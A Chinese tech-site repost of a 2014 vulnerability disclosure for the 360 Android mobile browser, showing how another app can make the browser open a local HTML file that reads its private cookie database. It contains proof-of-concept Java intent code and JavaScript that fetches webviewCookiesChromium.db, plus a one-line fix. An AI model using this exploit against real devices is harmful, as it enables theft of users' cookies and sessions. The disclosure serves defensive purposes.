知识屋:更实用的电脑技术知识网站
知识屋 手机游戏 手机软件 电脑软件 最近更新 手机端
冒险村物语 英雄无敌3塔防 驾考家园手游
password怎么用?p 诺诺视频会议怎 网易UU网游加速
所在位置:首页 > 网络安全 > 安全资讯

360手机浏览器缺陷可导致用户敏感数据泄漏

发布时间:2014-07-15 11:50:29作者:知识屋

当一个攻击app(恶意或非恶意均可以) 向360发送请求要求打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取360浏览器下的所有数据,包括cookie信息等,盗取过程无需root,盗取之后可以发送给远程服务器!
Android平台360手机浏览器最新版
 
: 5b252a142a450b34bd3253acb51882bd
 
2013年9月22日 17:00
 
 
  
copyFile(); //自定义函数,释放filehehe.到sd卡上

String url = "file:///mnt/sdcard/filehehe.html";

Intent contIntent = new Intent();

contIntent.setAction("android.intent.action.VIEW");

contIntent.setData(Uri.parse(url));

Intent intent = new Intent();

intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity");

intent.setAction("android.intent.action.VIEW");

intent.setData(Uri.parse(url));

this.startActivity(intent);

 

 
 
 
 
其中获取关键信息的filehehe.html文件:
 
 
  
function getDatabase() { 

var request = false;

    if(window.XMLHttpRequest) {

        request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

    }



    xmlhttp = request;



var prefix = "file:////data/data/com.qihoo.browser/databases";

var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db

var path = prefix.concat(postfix);



    // 获取本地文件代码

    xmlhttp.open("GET", path, false);



    xmlhttp.send(null);

    var ret = xmlhttp.responseText;



return ret;

}

 

 
 
修复方案:
限制file域的访问
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏

上一篇:苹果 iOS 7 非授权(无密码)浏览相册、联系人、发短信等

下一篇:遨游浏览器几个开发相关站点安全漏洞打包(源码泄漏、代码打包、

相关知识

软件推荐

更多 >

游戏推荐

更多 >

精选栏目

热门推荐

  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜

手机游戏

手机软件

电脑软件

猜你喜欢

唱歌 手机赚钱 投屏 教育 美食 武侠 模拟 WIFI 影音 钱包 彩票 棋牌 宫斗 运动 即时 网贷借钱 格斗 射击 放置 二次元 手机美化 舞蹈 母婴 旅游 策略 竞技 街机 RPG 趣味 联机 养成 冒险 经营 抢红包 生活 导航 直播 系统 视频 学习 辅助 西游 塔防 传奇 赛车 360 资讯 儿童 购物 节奏

本站所有软件来自互联网,版权归原著所有。如有侵权,敬请来信告知,我们将及时撤销。

知识屋 www.zhishiwu.com 更实用的电脑技术知识网站

苏ICP备14019037号-7